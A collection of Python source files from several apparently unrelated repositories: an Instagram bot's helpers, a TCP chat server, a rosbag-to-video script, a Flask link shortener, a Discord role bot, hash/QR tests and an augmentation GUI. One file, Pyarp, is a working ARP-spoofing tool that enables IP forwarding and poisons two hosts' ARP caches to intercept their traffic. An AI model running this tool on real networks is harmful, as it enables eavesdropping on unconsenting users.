from os.path import isabs
from random import choice, randrange
from PIL import Image
def get_timeout(timeout):
offset = choice([-1, 1]) * randrange(int(timeout / 20), int(timeout / 10) + 1)
return timeout + offset
def is_bnw(path):
img = Image.open(path)
w, h = img.size
pix = {"B": 0, "C": 0, "T": 0}
for i in range(int(w / 4)):
for j in range(int(h / 4)):
r, g, b = img.getpixel((i * 4, j * 4))
if r != g != b:
pix["C"] += 1
else:
pix["B"] += 1
pix["T"] += 1
try:
out = pix["C"] / pix["T"]
return out < 0.2
except ZeroDivisionError:
out = 0
return out < 0.2
finally:
img.close()
def validate_mail(config):
if "mailer" in config:
if "to" in config["mailer"] and "username" in config["mailer"] and "password" in \
config["mailer"]:
return True
return False
class PhotoStack:
def __init__(self):
self.photos = []
def __repr__(self):
return str([str(photo) for photo in self.photos])
def __len__(self):
return len(self.photos)
def push(self, item):
from instapy_bot.bot.utils.photo import Photo
if isinstance(item, Photo):
self.photos.append(item)
elif isabs(item):
self.photos.append(Photo(item))
def pop(self):
return self.photos.pop()
def is_empty(self):
return self.photos == []
class WrongPassword(Exception):
def __init__(self, *args: object) -> None:
super().__init__(*args)
print("Wrong password")
class ServerError(Exception):
def __init__(self, *args: object) -> None:
super().__init__(*args)
print("Server Error")
``` |
{
"source": "7atp/TCP-Chat",
"score": 3
} |
#### File: 7atp/TCP-Chat/final_server.py
```python
from socket import AF_INET, socket, SOCK_STREAM, SOCK_DGRAM, IPPROTO_UDP, SOL_SOCKET, SO_BROADCAST
from threading import Thread
def send_udp_invitation():
"""Sets up handling for incoming clients."""
Thread(target=accept_incoming_connections).start()
# Thread(target=tempfunc).start()
while True:
message = b"Send me ur free tcp port"
udp_server_socket.sendto(message, ('<broadcast>', 37020))
#print("invitation sent!")
# def tempfunc():
# while True:
# client, client_address = SERVER.accept()
# Thread(target=handle_client, args=(client,)).start()
def accept_incoming_connections():
"""Sets up handling for incoming clients."""
while True:
port, client_address = udp_listen.recvfrom(BUFSIZ)
if(port in addresses):
continue # duplicate
newport = int(port.decode("utf8"))
newaddr = ("localhost", newport)
print("%s:%d has connected." % newaddr)
addresses[port] = newaddr
client_socket2 = socket(AF_INET, SOCK_STREAM)
client_socket2.connect(newaddr)
clients[client_socket2] = newport
client_socket2.send(bytes(str(my_port), "utf8"))
client_socket2.send(bytes("Hi! Type your name and press enter", "utf8"))
# ------------
client, client_address2 = SERVER.accept()
Thread(target=handle_client, args=(client,)).start()
def handle_client(client):
name = client.recv(BUFSIZ).decode("utf8")
# welcome = 'Welcome %s! If you ever want to quit, type {quit} to exit.' % name
# client.send(bytes("{quit}", "utf8"))
msg = "%s has joined the chat!" % name
broadcast(bytes(msg, "utf8"))
while True:
msg = client.recv(BUFSIZ)
if msg != bytes("{quit}", "utf8"):
broadcast(msg, name+": ")
else:
client.send(bytes("{quit}", "utf8"))
client.close()
broadcast(bytes("%s has left the chat." % name, "utf8"))
break
def broadcast(msg, prefix=""): # prefix is for name identification.
"""Broadcasts a message to all the clients."""
for sock in clients:
sock.send(bytes(prefix, "utf8")+msg)
clients = {}
addresses = {}
# tcp
BUFSIZ = 1024
ADDR = ('', 33000)
my_port = 2100
SERVER = socket(AF_INET, SOCK_STREAM)
SERVER.bind(("localhost", my_port))
SERVER.listen(20)
if __name__ == "__main__":
udp_listen = socket(AF_INET, SOCK_DGRAM)
udp_listen.bind(('', 34000))
udp_server_socket = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)
udp_server_socket.setsockopt(SOL_SOCKET, SO_BROADCAST, 1)
udp_server_socket.settimeout(2)
udp_server_socket.bind(("", 33000))
print("Sending udp invitation & Waiting for tcp connection...")
ACCEPT_THREAD = Thread(target=send_udp_invitation)
ACCEPT_THREAD.start()
ACCEPT_THREAD.join()
SERVER.close()
``` |
{
"source": "7ayushgupta/Anahita",
"score": 3
} |
#### File: Anahita/utils/bag_to_video.py
```python
import roslib
roslib.load_manifest('rosbag')
import rosbag
import sys, getopt
import os
from sensor_msgs.msg import CompressedImage
from sensor_msgs.msg import Image
from cv_bridge import CvBridge, CvBridgeError
import cv2
import numpy as np
import shlex, subprocess
opt_fps =25.0
opt_rate = 1
opt_out_file=""
opt_fourcc = "XVID"
opt_topic = ""
opt_files = []
opt_display_images = False;
def print_help():
print
print 'rosbag2video.py [--fps 25] [--rate 1] [-o outputfile] [-s (show video)] [-t topic] bagfile1 [bagfile2] ...'
print
print 'converts image sequence(s) in ros bag file(s) to video file(s) with fixed frame rate using avconv'
print 'avconv needs to be installed! (sudo apt-get install libav-tools)'
print 'if no output file (-o) is given the filename \'<topic>.mp4\' is used and default output codec is h264'
print 'multiple image topics are supported only when -o option is _not_ used'
print 'avconv will guess the format according to given extension'
print 'compressed and raw image messages are supportet with mono8 and bgr8/rgb8'
print 'Maximilian Laiacker 2016'
if len(sys.argv) < 2:
print 'Please specify ros bag file(s)'
print 'For example:'
print_help()
exit(1)
else :
try:
opts, opt_files = getopt.getopt(sys.argv[1:],"hsr:o:c:t:",["fps=","rate=","ofile=","codec=","topic="])
except getopt.GetoptError:
print_help()
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print_help()
sys.exit()
elif opt == '-s':
opt_display_images = True
elif opt in ("-r", "--fps"):
opt_fps = float(arg)
elif opt in ("--rate"):
opt_rate = float(arg)
elif opt in ("-o", "--ofile"):
opt_out_file = arg
elif opt in ("-c", "--codec"):
opt_fourcc = arg
elif opt in ("-t", "--topic"):
opt_topic = arg
else:
print "opz:", opt,'arg:', arg
def filter_image_msgs(topic, datatype, md5sum, msg_def, header):
if(datatype=="sensor_msgs/CompressedImage"):
if (opt_topic != "" and opt_topic == topic) or opt_topic == "":
print "############# USING ######################"
print topic,' with datatype:', str(datatype)
return True;
if(datatype=="theora_image_transport/Packet"):
if (opt_topic != "" and opt_topic == topic) or opt_topic == "":
print topic,' with datatype:', str(datatype)
# print "############# USING ######################"
print '!!! theora not supportet, sorry !!!'
return False;
if(datatype=="sensor_msgs/Image"):
if (opt_topic != "" and opt_topic == topic) or opt_topic == "":
print "############# USING ######################"
print topic,' with datatype:', str(datatype)
return True;
return False;
t_first={};
t_file={};
t_video={}
cv_image = []
np_arr = []
if (opt_fps<=0):
opt_fps = 1
if (opt_rate<=0):
opt_rate = 1
print "using ",opt_fps," FPS"
p_avconv = {}
bridge = CvBridge()
for files in range(0,len(opt_files)):
#First arg is the bag to look at
bagfile = opt_files[files]
#Go through the bag file
bag = rosbag.Bag(bagfile)
for topic, msg, t in bag.read_messages(connection_filter=filter_image_msgs):
# print topic, 'at', str(t)#,'msg=', str(msg)
try:
if msg.format.find("jpeg")!=-1 :
if msg.format.find("8")!=-1 and (msg.format.find("rgb")!=-1 or msg.format.find("bgr")!=-1):
if opt_display_images:
np_arr = np.fromstring(msg.data, np.uint8)
cv_image = cv2.imdecode(np_arr, cv2.CV_LOAD_IMAGE_COLOR)
elif msg.format.find("mono8")!=-1 :
if opt_display_images:
np_arr = np.fromstring(msg.data, np.uint8)
cv_image = cv2.imdecode(np_arr, cv2.CV_LOAD_IMAGE_COLOR)
else:
print 'unsuportet format:', msg.format
exit(1)
if len(msg.data)>0:
if not topic in t_first :
t_first[topic] = t;
t_video[topic] = 0;
t_file[topic] = 0
t_file[topic] = (t-t_first[topic]).to_sec()
while t_video[topic]<t_file[topic]/opt_rate:
if not topic in p_avconv:
if opt_out_file=="":
out_file = str(topic).replace("/", "")+".mp4"
else:
out_file = opt_out_file
p_avconv[topic] = subprocess.Popen(['avconv','-r',str(opt_fps),'-an','-c','mjpeg','-f','mjpeg','-i','-',out_file],stdin=subprocess.PIPE)
p_avconv[topic].stdin.write(msg.data)
t_video[topic] += 1.0/opt_fps
if opt_display_images:
cv2.imshow(topic, cv_image)
key=cv2.waitKey(1)
if key==1048603:
exit(1);
except AttributeError:
try:
pix_fmt=""
if msg.encoding.find("mono8")!=-1 :
pix_fmt = "gray"
#np_arr = np.fromstring(msg.data, np.uint8)
if opt_display_images:
cv_image = bridge.imgmsg_to_cv2(msg, "bgr8")
elif msg.encoding.find("bgr8")!=-1 :
pix_fmt = "bgr24"
#np_arr = np.fromstring(msg.data, np.uint8)
if opt_display_images:
cv_image = bridge.imgmsg_to_cv2(msg, "bgr8")
elif msg.encoding.find("rgb8")!=-1 :
pix_fmt = "rgb24"
#np_arr = np.fromstring(msg.data, np.uint8)
if opt_display_images:
cv_image = bridge.imgmsg_to_cv2(msg, "bgr8")
else:
print 'unsuportet encoding:', msg.encoding
exit(1)
if len(msg.data)>0:
if not topic in t_first :
t_first[topic] = t;
t_video[topic] = 0;
t_file[topic] = 0
t_file[topic] = (t-t_first[topic]).to_sec()
while t_video[topic]<t_file[topic]/opt_rate:
if not topic in p_avconv:
if opt_out_file=="":
out_file = str(topic).replace("/", "")+".mp4"
else:
out_file = opt_out_file
size = str(msg.width)+"x"+str(msg.height)
p_avconv[topic] = subprocess.Popen(['avconv','-r',str(opt_fps),'-an','-f','rawvideo','-s',size,'-pix_fmt', pix_fmt,'-i','-',out_file],stdin=subprocess.PIPE)
p_avconv[topic].stdin.write(msg.data)
t_video[topic] += 1.0/opt_fps
if opt_display_images:
cv2.imshow(topic, cv_image)
key=cv2.waitKey(1)
if key==1048603:
exit(1);
except AttributeError:
# maybe theora packet
# theora not supportet
pass
bag.close();
``` |
{
"source": "7biok/flask-shortlink",
"score": 3
} |
#### File: 7biok/flask-shortlink/app.py
```python
from flask import Flask, render_template, request, redirect, url_for, Request
import shelve
from random import choice
from string import ascii_lowercase
import datetime
from flask_wtf import FlaskForm
from wtforms import SubmitField, StringField
from wtforms.validators import Length, URL
from os import urandom
app = Flask(__name__, template_folder="templates", static_folder="static")
URL_SHELVE_PATH = 'urls.shelve'
ANALYTICS_SHELVE_PATH = 'analytics.shelve'
DEBUG = True
app.config['SECRET_KEY'] = urandom(32)
BASE_URL = "https://7biok.online"
class ShortlinkForm(FlaskForm):
url = StringField('URL', validators=[
URL(require_tld=True, message='Invalid URL'),
Length(max=1000, message='Maximum URL length exceeded!')])
submit = SubmitField('Shorten!')
@app.route('/', methods=["GET", "POST"])
def root():
form = ShortlinkForm()
shortlink_url = None
if request.method == "POST" and form.validate_on_submit():
url = form.url.data
_debug(url)
id = _create_shortlink(url)
shortlink_url = BASE_URL + url_for('get_url', id=id)
form.url.data = ''
return render_template("index.html", form=form, url=shortlink_url)
@app.route('/<id>')
def get_url(id: str):
url = _lookup_url(id)
if url is None:
return redirect(url_for(root))
_updateData(request, id)
return redirect(url)
@app.route('/analytics/<id>')
def analytics(id):
data = _prepareData(id)
return render_template("analytics.html", total_visits=len(_loadData(id)), timeseries_data=data)
@app.route('/delete/<id>')
def delete(id):
with shelve.open(URL_SHELVE_PATH, 'c') as shelf:
del shelf[id]
return analytics_index()
@app.route('/analytics')
def analytics_index():
linklist = _loadShortlinks()
return render_template('analytics_index.html', linklist=linklist)
def _create_shortlink(url: str) -> str:
id = _make_id(url)
with shelve.open(URL_SHELVE_PATH, 'c') as shelf:
shelf[id] = url
with shelve.open(ANALYTICS_SHELVE_PATH, 'c') as shelf:
shelf[id] = []
return id
def _make_id(url: str, id_len: int = 3) -> str:
return ''.join(choice(ascii_lowercase) for n in range(id_len))
def _lookup_url(id: str) -> str:
with shelve.open(URL_SHELVE_PATH, 'r') as shelf:
try:
return shelf[id]
except Exception as e:
_debug(str(e))
return None
def _updateData(request: Request, id: str):
request_ip = request.remote_addr
user_agent = request.user_agent.platform
with shelve.open(ANALYTICS_SHELVE_PATH, 'c') as shelf:
data = shelf[id]
data.append({
'timestamp': datetime.datetime.now(),
'ip': request_ip,
'user_agent': user_agent
})
shelf[id] = data
def _loadData(id: str):
with shelve.open(ANALYTICS_SHELVE_PATH, 'r') as shelf:
return shelf[id]
def _prepareData(id: str):
# Format [yy-mm-dd, hits]
# Format [Android_Hits, ect]
data = _loadData(id)
result = []
for date in sorted(set([x['timestamp'].date() for x in data])):
datestring = (str(date.year) + "-" + str(date.month) + "-" + str(date.day))
visits = len([x['ip'] for x in data if x['timestamp'].date() == date])
result.append((datestring, visits))
return result
def _loadShortlinks():
res = []
with shelve.open(URL_SHELVE_PATH, 'r') as shelf:
for key in shelf.keys():
res.append((str(BASE_URL + '/' + str(key)), shelf[key], (str(BASE_URL + '/analytics/' + str(key)))))
return res
def _debug(s):
if DEBUG:
print("Shortlink: " + s)
def main():
print(_prepareData("img"))
app.run('localhost')
if __name__ == '__main__':
main()
``` |
{
"source": "7BISSO/Pyarp",
"score": 2
} |
#### File: Pyarp/pyarp/__main__.py
```python
from __future__ import print_function
import logging
import os
import sys
import time
from pyarplib import *
from scapy.all import *
import subprocess
import netifaces
import cmd
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
if os.geteuid() != 0:
sys.exit("""Permission denied : Pyarp must be run as root.""")
subprocess.call(['sysctl', '-w', 'net.ipv4.ip_forward=1'])
subprocess.call(['clear'])
__global_iface__ = 'eth0'
print(pyarp_banner())
def arpreq(inet, iface, option):
if option == 'clean':
ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff") /
ARP(pdst=inet), timeout=2, iface=iface, verbose=False)
return ans
elif option == 'verbose':
ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff") /
ARP(pdst=inet), timeout=2, iface=iface)
return ans
def getmac(ip):
if regex(ip, 'ip'):
reply = arpreq(ip, __global_iface__, 'clean')
for snd, rcv in reply:
return (rcv[Ether].src)
else:
return "[!] Please use a valide ip address (IPv6 not supported)."
def connected(host):
exp = str(getmac(host))
if regex(exp, 'mac'):
return True
else:
return False
def get_urmac():
AF_LINK = netifaces.ifaddresses(__global_iface__)[netifaces.AF_LINK]
urmac = str(AF_LINK).split("'addr': '")[1].split("'}")[0]
return urmac
def forge(psrc, pdst, hwsrc, hwdst):
arp_packet = ARP()
arp_packet.op = 2
arp_packet.psrc = psrc
arp_packet.pdst = pdst
arp_packet.hwsrc = hwsrc
arp_packet.hwdst = hwdst
return arp_packet
def recover(psrc, pdst, hwsrc, hwdst):
clean_packet = forge(psrc, pdst, hwsrc, hwdst)
send(clean_packet, verbose=False)
def syntax_err(cmd):
print("[!] Syntax Error : please type 'help " +
cmd + "' or 'man' for details.")
class Pyarp(cmd.Cmd):
prompt = '\033[1;94mpyarp>> \033[1;m'
__iface__ = netifaces.interfaces()
__AF__ = ['AF_INET', 'AF_LINK']
def do_iface(self, iface):
"""Usage : iface <interface name>"""
global __global_iface__
if iface in self.__iface__:
__global_iface__ = iface
elif iface:
print("[!] Unknown interface.")
else:
syntax_err('iface')
def complete_iface(self, text, line, begidx, endidx):
if not text:
completions = self.__iface__[:]
else:
completions = [
cmd for cmd in self.__iface__ if cmd.startswith(text)]
return completions
def do_inet(self, _AF):
"""Usage : inet [option], see 'man' for options"""
if _AF == 'AF_INET':
print("\033[1;96m{} : \033[1;m".format(__global_iface__))
print(netifaces.ifaddresses(__global_iface__)[netifaces.AF_INET])
elif _AF == 'AF_LINK':
print("\033[1;96m{} : \033[1;m".format(__global_iface__))
print(netifaces.ifaddresses(__global_iface__)[netifaces.AF_LINK])
elif _AF:
syntax_err('inet')
else:
print("\033[1;96m{} : \033[1;m".format(__global_iface__))
print(netifaces.ifaddresses(__global_iface__))
def complete_inet(self, text, line, begidx, endidx):
if not text:
completions = self.__AF__[:]
else:
completions = [cmd for cmd in self.__AF__ if cmd.startswith(text)]
return completions
def do_getmac(self, ip):
"""Usage : getmac <host ip address>"""
if ip:
print(getmac(ip))
else:
syntax_err('getmac')
def do_scan(self, inet):
"""Usage : scan <network>, eg {scan 192.168.1.0/24}"""
if inet and regex(inet, 'net'):
reply = arpreq(inet, __global_iface__, 'verbose')
print("\ninet {}".format(inet) +
"\niface {}\n".format(__global_iface__))
scn = 1
for snd, rcv in reply:
print("\033[1;92mHost {}\033[1;m: ".format(scn) +
(rcv.sprintf(r"MAC %Ether.src% IP %ARP.psrc%")))
scn = scn + 1
else:
syntax_err('scan')
print("[*] make sure to give a valid network address !")
def do_spoof(self, line):
"""Usage : spoof <target> <target> """
if line and len(line.split()) == 2:
_host = line.split()
if regex(_host[0], 'ip') and regex(_host[1], 'ip'):
if connected(_host[0]) and connected(_host[1]):
urmac = get_urmac()
hwhost_a = getmac(_host[0])
hwhost_b = getmac(_host[1])
arp_packet_a = forge(_host[0], _host[1], urmac, hwhost_b)
arp_packet_b = forge(_host[1], _host[0], urmac, hwhost_a)
print("\033[1;92m\n[+] Attack Launched.\n\033[1;m")
while True:
try:
send(arp_packet_a)
send(arp_packet_b)
time.sleep(2)
except KeyboardInterrupt:
recover(_host[0], _host[1], hwhost_a,
"ff:ff:ff:ff:ff:ff")
recover(_host[1], _host[0], hwhost_b,
"ff:ff:ff:ff:ff:ff")
break
print(
"\033[1;92m\n[+] Attack stopped, successful recover.\n\033[1;m")
else:
print("[!] Host '" + _host[0] + "' or '" + _host[1] +
"' not connected, use 'scan' to scan your network.")
else:
print("[!] Please use a valide ip address (IPv6 not supported).")
else:
syntax_err('spoof')
def do_man(self, _):
print(pyarp_manual())
def do_license(self, _):
print(pyarp_license())
def do_clear(self, _):
_ = subprocess.call(['clear'])
def emptyline(self):
'clean line'
def do_exit(self, line):
'Close pyarp, press Ctrl+D for quick exit'
return True
def do_EOF(self, line):
print('\n')
return True
def main():
Pyarp().cmdloop()
``` |
{
"source": "7BitLogic/AKEA",
"score": 3
} |
#### File: AKEA/tests/test_dbakea.py
```python
import unittest
from akea import dbakea
import configparser
class DBAKEAtest(unittest.TestCase):
def testDBAKEA_hash_and_file_functions(self):
"""Test the DBAKEA hashing functions.
Test DBAKEA basic functions by creating and adding to dbakea base and
than check backwards by reading the qrakea file.
Args:
self: object
Returns:
None
"""
config = configparser.ConfigParser()
config.read('test_akea.conf')
dbakea.append_to_db('./akea_test_dummies/', config) #E:/Programmieren/AKEA/tests
dbakea_entry = dbakea.check_qr(config, './akea_test_dummies/test_dummie1.txt.qrakea')
self.assertEqual(dbakea_entry, './akea_test_dummies\\test_dummie1.txt')
if __name__ == "__main__":
unittest.main()
```
#### File: AKEA/tests/test_qrakea.py
```python
import unittest
import binascii
from akea import qrakea
from akea import akea
ref_hash_data = ('./akea_test_dummies/test_dummie1.txt', '_sha512-336x_', 'ae23766d87092cd29d648cd74c0db7f2259d7515b0633cc312b15a819eb396944a2c81fc8d9286ccae18')
class QRAKEAtest(unittest.TestCase):
def testQRAKEA_QR_gen_and_read_functions(self):
"""Test the QRAKEA QR functions.
Test all QRAKEA basic functions by generating a QR image and decode it again..
Args:
self: object
Returns:
None
"""
file_path = './akea_test_dummies/test_dummie1.txt'
data = akea.hex_digest(file_path)
self.assertEqual(data, ref_hash_data)
img = qrakea.generate_qr_code(data)
img.save(file_path+'.qrakea', format='PNG', dpi=(600, 600))
re_read_data = qrakea.get_qr_image(file_path+'.qrakea')
self.assertEqual(binascii.unhexlify(data[2]), re_read_data)
if __name__ == "__main__":
unittest.main()
``` |
{
"source": "7bitlyrus/rolerequest",
"score": 2
} |
#### File: rolerequest/modules/limited.py
```python
import datetime
import logging
import typing
import discord
from discord.ext import commands, tasks
import config
from consts import *
import utils
class LimitedRequests(commands.Cog):
def __init__(self, bot):
self.bot = bot
self.db = bot.db
self.expiry_check.start()
self.expiry_check.clear_exception_types()
def cog_unload(self):
self.expiry_check.stop()
@tasks.loop(minutes=10, reconnect=False)
async def expiry_check(self):
logging.info('[Limited] Checking for expired requests...')
expire_before = (datetime.datetime.utcnow() - datetime.timedelta(hours=24)).timestamp() # 24 hours ago
for server in self.db:
for message_id, request in server['requests'].items():
if request['created'] > expire_before: continue
try:
guild = await self.bot.fetch_guild(server['id'])
except:
logging.info(f'[Limited] Unable to fetch guild for request {message_id}')
continue
await self.request_update(guild, message_id, request, 'expired')
logging.info(f'[Limited] Expired request {message_id}')
@expiry_check.before_loop
async def before_expiry_check(self):
await self.bot.wait_until_ready()
@commands.Cog.listener()
async def on_raw_reaction_add(self, payload):
if not payload.member: return
if payload.member.bot: return
doc = utils.getGuildDoc(self.bot, payload.member.guild)
if not doc: return
request = doc['requests'][str(payload.message_id)]
if not request: return
if str(payload.emoji) == config.greenTick:
await self.request_update(payload.member.guild, payload.message_id, request, 'approved', payload.member)
elif str(payload.emoji) == config.redTick:
await self.request_update(payload.member.guild, payload.message_id, request, 'denied', payload.member)
return
# Called from join command in core.py
async def request_create(self, ctx, role):
doc = utils.getGuildDoc(ctx.bot, ctx.guild)
channel = doc['requests_opts']['channel']
users_requests = list(filter(lambda e: e['user'] == ctx.author.id, doc['requests'].values()))
if doc['requests_opts']['hidejoins']:
try:
await ctx.message.delete(delay=5)
except:
pass
delete = 15
else:
delete = None
if not channel:
return await utils.cmdFail(ctx, f'Limited role requests are currently disabled for this guild.',
delete_after = delete)
existing_request = list(filter(lambda e: e['role'] == role.id, users_requests))
if existing_request and existing_request[-1]['status'] == 'pending':
return await utils.cmdFail(ctx, f'You already have a request pending for the role "{role.name}".',
delete_after = delete)
# Ratelimit if enabled & ratelimit score above maximum; score calculated from status of requests in last 24h
if doc['requests_opts']['ratelimit']:
rl_score = 0
for r in users_requests:
rl_score += 0 if not r["status"] in LIMITED_RATELIMIT_SCORES else LIMITED_RATELIMIT_SCORES[r["status"]]
if rl_score > LIMITED_RATELIMIT_SCORE_MAX:
return await utils.cmdFail(ctx, 'You have too many recent requests. Please try again later.',
delete_after = delete)
embed = discord.Embed(
title='Limited Role Request',
description=f'<@{ctx.message.author.id}> requested the <@&{role.id}> role.',
color=discord.Colour.blurple(),
timestamp=datetime.datetime.utcnow() + datetime.timedelta(hours=24))
embed.set_author(name=f'{ctx.message.author} ({ctx.message.author.id})', icon_url=ctx.message.author.avatar_url)
embed.add_field(name='Status', value='Pending. React to approve or deny the request.')
embed.set_footer(text='Request expires')
embed_message = await ctx.guild.get_channel(channel).send(embed=embed)
await embed_message.add_reaction(config.greenTick)
await embed_message.add_reaction(config.redTick)
utils.guildKeySet(ctx.bot, ctx.guild, f'requests.{embed_message.id}', {
'channel': embed_message.channel.id,
'created': datetime.datetime.utcnow().timestamp(),
'role': role.id,
'status': 'pending',
'user': ctx.author.id,
})
return await utils.cmdSuccess(ctx, f'Your request for "{role.name}" has been submitted.', delete_after = delete)
# Called from leave command in core.py
async def request_cancel(self, ctx, role):
doc = utils.getGuildDoc(ctx.bot, ctx.guild)
requests = list(filter(
lambda e: e[1]['user'] == ctx.author.id and e[1]['role'] == role.id, doc['requests'].items()
))
request = requests[-1] if requests else (None, None)
if not request[1] or request[1]['status'] != 'pending':
return await utils.cmdFail(ctx, f'You do not have a request pending for the role "{role.name}".')
await self.request_update(ctx.guild, request[0], request[1], 'cancelled')
return await utils.cmdSuccess(ctx, f'Your request for "{role.name}" has been cancelled.')
async def request_update(self, guild, message_id, request, status, mod = None):
statuses = {
'cancelled': {
'colour': discord.Colour.darker_grey(),
'footer': 'Request cancelled',
'status': 'Cancelled by user.'
},
'approved': {
'colour': discord.Colour.dark_green(),
'dm': 'been approved.',
'footer': 'Request approved',
'status': f'Approved by {mod}.'
},
'denied': {
'colour': discord.Colour.dark_red(),
'dm': 'been denied.',
'footer': 'Request denied',
'status': f'Denied by {mod}.'
},
'expired': {
'colour': discord.Colour.greyple(),
'dm': 'expired due to lack of moderator response.',
'footer': 'Request expired',
'status': f'Request expired due to lack of moderator response.'
}
}
member = await guild.fetch_member(request['user'])
role = guild.get_role(request['role'])
layout = statuses[status]
if status == 'approved':
await member.add_roles(role, reason='User role request approved')
if status == 'expired':
utils.guildKeyDel(self.bot, guild, f'requests.{message_id}')
else:
utils.guildKeySet(self.bot, guild, f'requests.{message_id}.status', status)
if request['status'] == 'pending':
channel = await self.bot.fetch_channel(request['channel'])
try:
embed_message = await channel.fetch_message(message_id)
embed = embed_message.embeds[0]
embed.colour = layout['colour']
embed.timestamp = datetime.datetime.utcnow()
embed.set_footer(text=layout['footer'])
embed.remove_field(0)
embed.add_field(name='Status', value=layout['status'])
await embed_message.edit(embed=embed)
await embed_message.clear_reactions()
except:
pass
if status != 'cancelled':
try:
await member.send(f'Your request for "{role}" in "{guild}" has {layout["dm"]}')
except:
pass
return
@commands.group(name='limited', invoke_without_command=True, case_insensitive=True)
@commands.has_guild_permissions(manage_guild=True)
@commands.guild_only()
@utils.guild_in_db()
async def _limited(self, ctx):
'''
Manages settings for limited role requests
'''
doc = utils.getGuildDoc(ctx.bot, ctx.guild)
channel = doc['requests_opts']['channel']
hidejoins = doc['requests_opts']['hidejoins']
ratelimit = doc['requests_opts']['ratelimit']
embed = discord.Embed(title=f'Limited Role Request Options for: {ctx.guild}')
embed.set_footer(text=f'Use the "{ctx.prefix}help limited" command for help on changing these settings.')
if channel == None:
embed.description = 'Requests are currently disabled for this guild.'
return await ctx.send(embed=embed)
embed.add_field(name='Posting Channel', value=f'<#{channel}>')
embed.add_field(name='Join Command Hiding', value='Enabled' if hidejoins else 'Disabled')
embed.add_field(name='Join Command Ratelimiting', value='Enabled' if ratelimit else 'Disabled')
return await ctx.send(embed=embed)
@_limited.command(name='disable')
@utils.guild_in_db()
async def _limited_disable(self, ctx):
'''Disables limited role requests for the guild'''
doc = utils.getGuildDoc(ctx.bot, ctx.guild)
if doc['requests_opts']['channel'] == None:
return await utils.cmdFail(ctx, f'Requests are already disabled for this guild.')
utils.guildKeySet(ctx.bot, ctx.guild, 'requests_opts.channel', None)
return await utils.cmdSuccess(ctx, f'Requests are now disabled for this guild.')
@_limited.command(name='channel')
@utils.guild_in_db()
async def _limited_channel(self, ctx, channel: discord.TextChannel):
'''Sets the channel that limited role requests will be posted in'''
doc = utils.getGuildDoc(ctx.bot, ctx.guild)
if doc['requests_opts']['channel'] == channel.id:
return await utils.cmdFail(ctx, f'The requests channel is already {channel}.')
utils.guildKeySet(ctx.bot, ctx.guild, 'requests_opts.channel', channel.id)
return await utils.cmdSuccess(ctx, f'The requests channel is now {channel}.')
@_limited.command(name='hidejoins', aliases=['hidejoin'])
@utils.guild_in_db()
async def _limited_hidejoins(self, ctx, setting: typing.Optional[bool]):
'''Sets automatic deletion of join commands for limited roles'''
return await self._limited_option_toggle(ctx, setting, 'hidejoins', 'hiding')
@_limited.command(name='ratelimit', aliases=['ratelimiting', 'ratelimited'])
@utils.guild_in_db()
async def _limited_ratelimited(self, ctx, setting: typing.Optional[bool]):
'''Sets ratelimiting of join commands for limited roles'''
return await self._limited_option_toggle(ctx, setting, 'ratelimit', 'ratelimiting')
# Generic togglable option prototype for hidejoins and ratelimit
async def _limited_option_toggle(self, ctx, user_setting, setting_key, setting_string):
doc = utils.getGuildDoc(ctx.bot, ctx.guild)
current = doc['requests_opts'][setting_key]
if user_setting is None:
user_setting = not current
human = 'enabled' if user_setting else 'disabled'
if user_setting == current:
return await utils.cmdFail(ctx, f'Limited role join command {setting_string} is already **{human}**.')
utils.guildKeySet(ctx.bot, ctx.guild, f'requests_opts.{setting_key}', user_setting)
return await utils.cmdSuccess(ctx, f'Limited role join command {setting_string} is now **{human}**.')
def setup(bot):
bot.add_cog(LimitedRequests(bot))
logging.info('[Extension] Limited module loaded')
def teardown(bot):
bot.remove_cog('LimitedRequests')
logging.info('[Extension] Limited module unloaded')
``` |
{
"source": "7bits/augbuilder",
"score": 3
} |
#### File: augbuilder/augbuilder/augmentation.py
```python
import albumentations
import streamlit as st
from elements import (
checkbox,
element_description,
min_max,
num_interval,
radio,
rgb,
several_nums,
text_input,
)
def select_next_aug(augmentations):
"""
Returns last selected transformation.
Parameters:
augmentations: dict with all available transformation from json file
Returns:
last selected transformation
"""
oneof_list = [['OneOf'], ['StopOneOf']]
oneof = ['OneOf', 'StopOneOf']
default_selection = list(augmentations.keys())
selection = ['None'] + oneof_list[0] + default_selection
selected_aug = [
st.sidebar.selectbox('select transformation 1: ', selection),
]
while (selected_aug[-1] != 'None'):
transformation_number = len(selected_aug) + 1
select_string = 'select transformation {0}: '.format(
transformation_number,
)
current_aug = selected_aug[-1]
if current_aug == oneof[0]:
oneof_ind = selection.index(oneof[0])
selection[oneof_ind] = oneof[1]
elif current_aug == oneof[1]:
stoponeof_ind = selection.index(oneof[1])
selection[stoponeof_ind] = oneof[0]
if selected_aug and current_aug not in oneof:
selection.remove(current_aug)
selected_aug.append(st.sidebar.selectbox(select_string, selection))
return selected_aug[:-1]
def apply_changes(augment_dict, apply_compose=True):
"""
Composes selected transformation.
Parameters:
augment_dict: dict with selected transformations
apply_compose: if True, returns ready to apply transformation
Returns:
transform: returns all selected transformations with params,\
if apply_compose - returns ready to apply transformation
"""
all_keys = list(augment_dict.keys())
if all_keys:
transform = []
for i in all_keys:
current_dict = augment_dict[i]
if current_dict is not None:
transform = add_transformation(transform, i, **current_dict)
else:
transform = add_transformation(transform, i)
if apply_compose:
transform = albumentations.Compose(transform)
return transform
def add_transformation(final_transform, curr_transf, **current_dict):
"""
Adds last transformation to existing ones.
Parameters:
final_transform: all transformation with params
curr_transf: selected transformation
**current_dict: params for current transformation
Returns:
final_transform: all transformation with params
"""
transform = getattr(albumentations, curr_transf)
if (current_dict is not None):
if curr_transf == 'OneOf':
apply_replay = False
current_dict = apply_changes(current_dict, apply_replay)
final_transform.append(transform(current_dict))
else:
final_transform.append(transform(**current_dict))
else:
final_transform.append(transform())
return final_transform
def setup_current_choice(current_choice, augmentations, session_state):
"""
Displays settings current parameters format and returns its value.
Parameters:
current_choice: selected currnet transformation as a string
augmentations: dict with all available transformation from json file
session_state: current session information
Returns:
current_params: dict with settings for transformation and its values
"""
elements_type = {
'num_interval': num_interval,
'radio': radio,
'rgb': rgb,
'min_max': min_max,
'checkbox': checkbox,
'several_nums': several_nums,
'text_input': text_input,
}
current_params = {}
if augmentations[current_choice]:
desc = element_description(current_choice)
if not desc:
desc = ''
